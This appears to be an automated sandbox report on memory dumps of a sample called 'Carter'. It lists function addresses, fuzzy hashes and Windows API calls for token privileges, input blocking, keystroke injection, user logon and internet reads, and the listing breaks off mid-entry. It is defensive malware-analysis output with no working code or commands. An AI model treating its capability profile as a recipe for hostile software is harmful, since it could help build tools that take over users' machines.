Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
Instruction ID: 648c980480628243c1c74e95b4b22b551074198d8838a542c2ad2fc64abfcc3f
Opcode Fuzzy Hash: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
Instruction Fuzzy Hash: 9211BF723009169FE7316F669C84A6FBFD9EF84760B408169F806D7281DE70E9018FA0

Function 00AC0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AC0034
__swprintf.LIBCMT ref: 00AC0065

Strings

WIN_XPe, xrefs: 00AC00A4
%.3d, xrefs: 00AC003F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 58195f4a9a955d512fee980145a1952f07ad3a90ee8acb3d9fb8572004b7a96f
Instruction ID: 0c3c5d500a8aa21809c3c10268df8bc70a4bf1efe744399c04f966048f737b61
Opcode Fuzzy Hash: 58195f4a9a955d512fee980145a1952f07ad3a90ee8acb3d9fb8572004b7a96f
Instruction Fuzzy Hash: D5D05B72818108EACB049B90CD44FFE73BCEB48300F224056F506E3050D7358788DB26

Function 00AF29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AF1ED6,00000000), ref: 00AF2AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AF2AE4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 52a7261ce736c2ca5e4e996a8c777dcdc12075a57b3183e35a8f41671b7a4b84
Instruction ID: 2d77bf6af507bd5f15edd981927e3d6e4c8fc260e8e3aff7cce4360252b126ea
Opcode Fuzzy Hash: 52a7261ce736c2ca5e4e996a8c777dcdc12075a57b3183e35a8f41671b7a4b84
Instruction Fuzzy Hash: 5A415D7160460DBFEB20EE94CD85FBAB7BCEB407A4F10406AFB45A7181EA719E419760

Function 00AD9399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
GetLastError.KERNEL32 ref: 00AD941D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 9033a8a8a9177dde301a3e63cdaccc39d3f5310207731022dffe62c75fff6693
Instruction ID: b6dbbb3b87c711b247d60fbbef0188099940ff6c8031d8104758649f6ce96585
Opcode Fuzzy Hash: 9033a8a8a9177dde301a3e63cdaccc39d3f5310207731022dffe62c75fff6693
Instruction Fuzzy Hash: 16118FB1414209AFD728EF54DD85D6BB7BCEB48710B20852EF45A97281EB70EC41CB64

Function 00AE42D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE42FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00AE433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE4345

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 3f92096934044d3b0f56b84cbe3e5da399fa33eb43be7f9cf066d5ad160881f6
Instruction ID: 810de1b6f92f25559f539c407ff92c2953d3b38d4204eec6cd8f616bec7948fc
Opcode Fuzzy Hash: 3f92096934044d3b0f56b84cbe3e5da399fa33eb43be7f9cf066d5ad160881f6
Instruction Fuzzy Hash: FE1182B1910229BFE7109BE99C48FEFB7BCEB0D710F004156B914EB190C6B85E4087A1

Function 00AE4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AE4F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AE4F5C
FreeSid.ADVAPI32(?), ref: 00AE4F6C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: bceb8b7cd61e67a82781b08ef77c2d94a67728aa96155b9644b9f9ed4ce64179
Instruction ID: 07690182cbac3684f1d88afcc251ed97d02c0801ec4d167bc96ff6a64627acb4
Opcode Fuzzy Hash: bceb8b7cd61e67a82781b08ef77c2d94a67728aa96155b9644b9f9ed4ce64179
Instruction Fuzzy Hash: 7EF04975A2130CBFDF00DFE0DC89AEEBBBCEF08201F4044A9A901E3180EB756A448B50

Function 00AE1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AE1B01
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00AE1B14

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: af158c185cdce154ebffa9dca5cb2800978d409922224581d89d4a9bcdc4d119
Instruction ID: 0e67eac8fa7398e32bf043d77cbf57daa5696e1468a2ebb8893d9c91d0e458d6
Opcode Fuzzy Hash: af158c185cdce154ebffa9dca5cb2800978d409922224581d89d4a9bcdc4d119
Instruction Fuzzy Hash: A2F0A93190024CABDB00DF91C805BFEBBB4FF14301F00800AF94596292D3798611DF94

Function 00AEA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6EC

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 155d3660d536c5c3d03b86f24bb0e36d2e636ed963640bc2a2b3fb823b225a73
Instruction ID: a37295f02fc296a9da4f029f12cc4c32b1db0434ddbef963d4dc5c4d020a3ea4
Opcode Fuzzy Hash: 155d3660d536c5c3d03b86f24bb0e36d2e636ed963640bc2a2b3fb823b225a73
Instruction Fuzzy Hash: 5DF0823551422EBBDB20AFA5CC48FEA77ACAF09361F008156B91897191DA709A40CBE1

Function 00AD8DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c0be6c0195e6377d4eb2ef542285733aac9bc86e89e31a98df9a7c6ac72cf14d
Instruction ID: 6ae055b2345734e977aa208cff6f386a8c971ea5bb2eed9b2de9d5ee3604a234
Opcode Fuzzy Hash: c0be6c0195e6377d4eb2ef542285733aac9bc86e89e31a98df9a7c6ac72cf14d
Instruction Fuzzy Hash: 84E0B676010611EFE7262B60ED09EB77BADEB05360B15C92DF4AA854B0DB62ACD0DB50

Function 00AAA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AA8F87,?,?,?,00000001), ref: 00AAA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AAA393

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0de7747be17cb18b919877a137ae50f8b36f3f5b62b17d0924a45a8462b26155
Instruction ID: 8c2ecc9b544c6a1006f908ee80535bc204f304c09052e9f13d000605e6137799
Opcode Fuzzy Hash: 0de7747be17cb18b919877a137ae50f8b36f3f5b62b17d0924a45a8462b26155
Instruction Fuzzy Hash: 4DB0923107420CEBCA403B91FC09BC83F68EB48B62F808010F61D46064CFA254908A99

Function 00AF45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00AF45F0

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 3fccb5c4993b4d7c529490099916504c1a6eaeee39bbcb0bec5fe38a500efb56
Instruction ID: 100426b60f15dc5f13c062993afb3a2cb247b5a81228a017a320bfbfed5ac638
Opcode Fuzzy Hash: 3fccb5c4993b4d7c529490099916504c1a6eaeee39bbcb0bec5fe38a500efb56
Instruction Fuzzy Hash: 6EE04F352102199FD710BFA9E904A9BF7E8AF98760F008416FD49D7351DEB0ED418B91

Function 00AE51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AE5205

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 0d983752b29fc27688fbe22bdab808e6ef2982ef8036a24c79463e5e15ba75aa
Instruction ID: 85254b9cec51d6d11efeb4670ddebc95546da76b627e42222c4488224708a69a
Opcode Fuzzy Hash: 0d983752b29fc27688fbe22bdab808e6ef2982ef8036a24c79463e5e15ba75aa
Instruction Fuzzy Hash: 83D052A8960F8A78EC1833BABE0FF761208EB007C8F84874970028A0C2ECD06881A431

Function 00AD9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AD8FA7), ref: 00AD9389

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
Instruction ID: 52c6625989d39161f9b8a1f11529b4d43dc9e1c31ac11883596ac3c91e06ca80
Opcode Fuzzy Hash: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
Instruction Fuzzy Hash: 60D09E3226450EABEF019EA4DD05EEE3B69EB04B01F808511FE15D61A1CB75D935AB60

Function 00AC0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00AC0734

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
Instruction ID: 89874b5e0a5ac1fe1730e6e2d3ab661db014f9df5b0ed76a3aab4b8256c6ad2e
Opcode Fuzzy Hash: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
Instruction Fuzzy Hash: 9AC04CF181010DDBCB05DBA0D988EEE77BCAB08305F114059A145B2100D7749B448A71

Function 00AAA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AAA35A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
Instruction ID: c2d3e0d40518837f13437eb3b3eaab30e2d4e9077106cf6d2221920c396668db
Opcode Fuzzy Hash: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
Instruction Fuzzy Hash: B5A0123002010CA78A002B41FC044847F5CD6042507408010F40C01021CB7254504584

Function 00B03BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00B10980), ref: 00B03C65
IsWindowVisible.USER32(?), ref: 00B03C89

Strings

FINDSTRING, xrefs: 00B03DB4
UNCHECK, xrefs: 00B03EC1
CHECK, xrefs: 00B03EAB
ISVISIBLE, xrefs: 00B03C75
GETSELECTED, xrefs: 00B03EE1
ISCHECKED, xrefs: 00B03E77
GETCURRENTSELECTION, xrefs: 00B03E21
SENDCOMMANDID, xrefs: 00B04018
DELSTRING, xrefs: 00B03D87
GETLINE, xrefs: 00B03FD9
TABLEFT, xrefs: 00B03CC5
SELECTSTRING, xrefs: 00B03E44
CURRENTTAB, xrefs: 00B03CFB
GETCURRENTLINE, xrefs: 00B03F2B
TABRIGHT, xrefs: 00B03CDB
ISENABLED, xrefs: 00B03CA9
SETCURRENTSELECTION, xrefs: 00B03DF4
EDITPASTE, xrefs: 00B03F9D
GETLINECOUNT, xrefs: 00B03F04
ADDSTRING, xrefs: 00B03D54
HIDEDROPDOWN, xrefs: 00B03D3E
SHOWDROPDOWN, xrefs: 00B03D1E
GETCURRENTCOL, xrefs: 00B03F66

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
Instruction ID: 9b50e2e975de780103338a461ccd827b7ebafc53c846a0b60123545166f96c3d
Opcode Fuzzy Hash: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
Instruction Fuzzy Hash: C5D1A0312043018FCB14EF50C995AAEBBE5EF95744F204999F9466B3E2DB31EE4ACB41

Function 00B0ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B0AC55
GetSysColorBrush.USER32(0000000F), ref: 00B0AC86
GetSysColor.USER32(0000000F), ref: 00B0AC92
SetBkColor.GDI32(?,000000FF), ref: 00B0ACAC
SelectObject.GDI32(?,?), ref: 00B0ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00B0ACE6
GetSysColor.USER32(00000010), ref: 00B0ACEE
CreateSolidBrush.GDI32(00000000), ref: 00B0ACF5
FrameRect.USER32(?,?,00000000), ref: 00B0AD04
DeleteObject.GDI32(00000000), ref: 00B0AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00B0AD56
FillRect.USER32(?,?,?), ref: 00B0AD88
GetWindowLongW.USER32(?,000000F0), ref: 00B0ADB3

Part of subcall function 00B0AF18: GetSysColor.USER32(00000012), ref: 00B0AF51
Part of subcall function 00B0AF18: SetTextColor.GDI32(?,?), ref: 00B0AF55
Part of subcall function 00B0AF18: GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
Part of subcall function 00B0AF18: GetSysColor.USER32(0000000F), ref: 00B0AF76
Part of subcall function 00B0AF18: GetSysColor.USER32(00000011), ref: 00B0AF93
Part of subcall function 00B0AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
Part of subcall function 00B0AF18: SelectObject.GDI32(?,00000000), ref: 00B0AFB2
Part of subcall function 00B0AF18: SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
Part of subcall function 00B0AF18: SelectObject.GDI32(?,?), ref: 00B0AFC8
Part of subcall function 00B0AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
Part of subcall function 00B0AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
Part of subcall function 00B0AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: eef43cb7934c693824dd56539853a40b2cb5e5aaf60c7329e3b8fbf068b988e8
Instruction ID: 00923177e3e71bed276506ed193d79f4811bfb9dbda4e6a0de3a3b227b148044
Opcode Fuzzy Hash: eef43cb7934c693824dd56539853a40b2cb5e5aaf60c7329e3b8fbf068b988e8
Instruction Fuzzy Hash: EEA16E71018305AFD711AF64DC48AAB7BE9FF88321F508A19F562971E0DB74D984CF52

Function 00A82FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00A83072
DeleteObject.GDI32(00000000), ref: 00A830B8
DeleteObject.GDI32(00000000), ref: 00A830C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00A830CE
